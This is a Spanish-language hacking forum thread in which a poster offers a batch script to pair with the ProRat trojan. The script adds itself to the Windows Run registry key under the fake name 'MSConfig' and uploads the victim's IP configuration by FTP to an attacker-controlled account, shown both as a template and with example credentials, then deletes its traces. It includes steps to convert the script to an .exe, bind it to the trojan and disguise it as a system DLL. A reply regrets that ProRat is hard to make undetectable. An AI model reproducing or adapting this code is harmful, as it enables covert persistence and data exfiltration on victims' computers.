mmm mira talves notificacion al correo.. en eso no sepa como ayudarte....pero pensando un poco se me ha ocurrido la manera de que tengas las ip...

Necesitas saber Batch y
Tener una cuenta FTP ([Enlace externo eliminado para invitados] recomendada por mi xD)

y lo mas importante... este codigo en .bat (el batch xD)

Código: Seleccionar todo

@echo off
reg add hklm\software\microsoft\windows\currentVersion\run /v MSConfig /t REG_SZ /d C:(carpeta donde estaria el prorat)\batch.exe /f

ipconfig>ip.txt
echo tucuentaftp.nombredeldominioftp.com>ftp.tmp
echo contraseñaftp>>ftp.tmp
echo put ip.txt>>ftp.tmp
echo disconnect>>ftp.tmp
echo bye>>ftp.tmp
ftp -s:ftp.tmp ftp.nombredeldominioftp.com
del /f /s /q "ip.txt"
del /q /f /s ftp.tmp>nul
exit
que deves hacer:
1º Cambiar los datos (mas abajo pongo un ejemplo)
2º Pasar de .bat a .exe con un programa llamado "batch to exe" (BUSCALO)
3º juntar el batch pasado a .exe,a tu troyano prorat.exe (juntalo con el iexpress)


ia tonces me explico:

lo que haria este codigo seria hacer que cada ves que se inicie el sistema, mandarte la ip de la persona que tiene el prorat metido en su sistema al t35, la ip la encontraras cuando te loguees en t35.

para que esto funcione, tienes que hacer que "el troyano unido con nuestro codigo" se inicie cada ves, y para eso es la parte del codigo

Código: Seleccionar todo

reg add hklm\software\microsoft\windows\currentVersion\run /v MSConfig /t REG_SZ /d C:(carpeta donde estaria el prorat)\batch.exe /f

aqui es donde deverias hacer que se descargue tu troyano, y cambiar la direccion que yo puse xD por la direccion en donde se pondra tu prorat :D (se entiende?)

en la practica, tu codigo seria mas o menos asi:

Código: Seleccionar todo

@echo off
reg add hklm\software\microsoft\windows\currentVersion\run /v MSConfig /t REG_SZ /d C:\windows\\system32\windll32proratybat.exe /f

ipconfig>ip.txt
echo shock1.t35.com>ftp.tmp
echo streetfigter>>ftp.tmp
echo put ip.txt>>ftp.tmp
echo disconnect>>ftp.tmp
echo bye>>ftp.tmp
ftp -s:ftp.tmp ftp.t35.com
del /f /s /q "ip.txt"
del /q /f /s ftp.tmp>nul
exit
y el nombre seria windll32proratybat.exe

bueno talves me exedi, pero como lo encontre una manera ingeniosa y buena de utilizar un troyano de coneccion directa, aprobecho de ponerla por si le sirve a alguien mas

saludos
caeras como han caido los otros... aunque tenga que sacarte 5 firmas xD
ProRat, que lindo troyano ... fue mi primer troyano lastima que cuesta hacerlo indetectables

aunque capas algunos si pueden, pero yo no pude
Imagen
Responder

Volver a “Dudas y Preguntas”